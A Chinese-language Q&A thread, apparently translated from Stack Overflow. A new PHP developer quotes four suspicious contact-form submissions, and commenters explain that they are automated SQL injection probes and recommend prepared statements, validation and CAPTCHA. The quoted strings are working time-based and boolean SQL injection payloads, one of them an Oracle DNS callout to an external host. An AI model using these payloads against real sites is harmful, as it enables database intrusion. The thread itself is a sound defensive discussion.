【发布时间】:2018-03-20 14:01:54
【问题描述】:
我是 PHP 开发的新手。我使用 PHP、HTML 和 Css 创建了一个网站,其中有一个联系我们页面。从最近几天开始,来自特定国家(我不想提及国家名称)的某个人正在创建支持消息并输入一些不寻常或可疑的消息。
联系人有四个字段,例如全名、电子邮件、主题和消息。 有人正在发送类似的消息
1st:
written as "Subject" & (select(0)from(select(sleep(6)))v)/*'+
(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2nd:
-1' OR 2+582-582-1=0+0+0+1 or '0gX9xp3t'='
3rd:
1iY5zL4R'));select pg_sleep(3); --
4th:
1||UTL_INADDR.get_host_address('dns.'||'sqli.032682.7775.77.a4f00.1.bxss'||'.me')
还有很多,请熟悉 PHP 的人或其他人告诉我这是怎么回事。另外请分享一些我应该采取的安全预防措施,以防止任何威胁或黑客攻击。
我已经使用 MYSQLi 构建了我的网站,以防止/减少 SQL 注入威胁。
【问题讨论】:
-
有人试图通过 SQL 注入入侵您的网站。如果您使用准备好的语句进行查询,则无需担心。
-
是的,我正在使用准备好的语句,例如 $db->prepare、$db->param 等,“$db”是我的数据库连接变量。一切正常,到目前为止没有任何伤害,但我很害怕。
-
@CD001 你怎么猜到的?
-
@user2945468 - 这是一个自动向您的表单发送垃圾邮件的机器人/脚本;很常见的攻击形式。可能值得一看Google Invisible reCAPTCHA
-
为您的表单输入添加一些输入验证和清理;这将限制您收到的“垃圾”/“淘气”
标签: php sql code-injection